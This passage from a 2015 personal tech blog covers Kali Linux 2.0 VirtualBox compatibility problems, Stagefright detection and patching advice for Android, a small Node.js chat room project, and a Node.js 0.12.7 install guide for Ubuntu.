"Apache2" is listening on TCP6 only.
"redis-server" is running in the background.

"dkms" accompanied with only one headers file.
Guest Additions CD install with the same "systemctl" error message.

"systemd" errors will be produced on selecting "openvas start".

Running on VirtualBox 4.3.30 on Ubuntu 14.04.3 host :

"armitage" cannot be launched.
"maltego" and "BeEF" can be launched with one click.

"VLC media player" and "ImageMagick" do not work.
"system log" works.
"Apache2" is listening on TCP6 only.
"redis-server" is running in the background.

"dkms" accompanied with only one headers file.
Guest Additions CD install with the same "systemctl" error message.

* Not kidding, it has error message.

"systemd" errors will be produced on selecting "openvas start".

Obviously, Kali Linux Team did not well test their work before it is released. The content of VirtualBox image is different from the ISO. The rating is still remain as ACCEPTABLE!

I will not test any ISO or image files for this release any more. May be wait for the next release.

* It seems that this VirtualBox image is installed VirtualBox 5.0 Guest Additions CD


Update on August 14, 2015

muts stated that I am misinformed. Therefore, I make a very boring video (about 26 minutes long) to proof which is posted at the beginning of this article today.

The Kali Linux official site asks user to use VirtualBox 4.2.xx or higher to run.

Armitage is updated yesterday by Kali Linux Team. Therefore, it is working fine now. Meanwhile, VirtualBox is updated from 5.0.0 to 5.0.2 and the high CPU loading on Linux host is fixed.

I also test Debian 8.1 (latest update) on the same environment and installed the Guest Additions CD. I also encounter the "systemctl double free or corruption (fasttop)" error. This error may be from VirtualBox 5.0.x or from Debian.

However, Kali Linux Team forgot to test their amazing Kali Linux 2.0 with VirtualBox 5.0.x on Linux host. Therefore, the rating is still ACCEPTABLE.


Update on August 17, 2015

Fedora 22 is systemd by default. I install Fedora 22 (64-bit) on VirtualBox 5.0.2 with Ubuntu 14.04 host without any problem or error, including Guest Additions CD install.

I also test Kali Linux 2.0 (64-bit) on VirutalBox 5.0.2 with Mac OSX 10.10.5 and it has the similar errors.


Update on August 25, 2015

Since I do not like Kali Linux 2.0, I install my favourite tools on Ubuntu 14.04 LTS recently (please refers to here). I find out that at least BeEF is running very difference between Kali Linux 2.0 and Ubuntu 14.04 on VirtualBox 5.0.2. Kali Linux 2.0 will produces error messages while Ubuntu does not. Both version of BeEF are 0.4.6.1-alpha. I make a video on that, here you are :




Thursday, August 06, 2015

HOWTO : Stagefright Vulnerabilities Detection and Protection on Android

What is Stagefright vulnerabilities in Android?

Android devices running Android versions 2.2 through 5.1.1_r5 contain vulnerabilities in the Stagefright media playback engine. Exploitation of these vulnerabilities may allow an attacker to access multimedia files or potentially take control of a vulnerable device.

Detection

To test your Andorid if it is vulnerable to Stagefright vulnerabilities, you can use the following Apps by Zimperium INC.

Google Play - Stagefright Detector by Zimperium INC

Protection

It is recommended to update/upgrade your Android ROM to non-vulnerable version. If your vendors do not release any update/upgrade, you can perform the following steps for a workaround.

Workaround to protect your Android device

Remarks

I confirmed that CyanogenMod 12.1 Nightly for OnePlus One is fixed the Stagefright vulnerabilities by using Google Play - Stagefright Detector by Zimperium INC while OnePlus One v5.0.2 (Cyanogen OS version 12.0-YNG1TAS2I3) and Google Nexus 5 v5.1.1 (Build number LMY48B) are still vulnerable to Stagefright vulnerabilities at the time of this writing.

It is also confirmed that CyanogenMod 12.0 and 12.1 are fixed for the vulnerabilities. Or, you may consider to flash CyanogenMod ROM if your devices are supported.

If you have OnePlus One, you can follow this guide to update/upgrade your OnePlus One.

That's all! See you.

Monday, August 03, 2015

Node Chat Room (NodeChat)

The Node Chat Room (NodeChat) is developed with Node.js and it is forked from "Smashing Node.js: JavaScript Everywhere" Chapter 6. It is modified by Samiux and is released under GPLv3 License.

It provides basic chat room features, including private message. It will not save anything in the server.




You can download it at here.

That's all! See you.

Saturday, August 01, 2015

HOWTO : Install Node.js 0.12.7 on Ubuntu 14.04.2 LTS x86_64

Install node.js binaries :

wget https://nodejs.org/dist/v0.12.7/node-v0.12.7-linux-x64.tar.gz

cd /usr/local && sudo tar --strip-components 1 -xzf ~/node-v0.12.7-linux-x64.tar.gz

node --version
npm --version


Install express :

sudo npm install -g express

Install express executable :

sudo npm install -g express-generator

Create a project namely blog, for example :

express blog

cd blog

sudo npm install

To run the blog project :

npm start

Start the browser at http://localhost:3000 and you will see a sample site.

Now, you can edit the files in the blog directory to made you site.

Remark :

If you are compiling Node.js from source, you need the following packages :

sudo apt-get install build-essential libssl-dev apache2-utils

That's all! See you.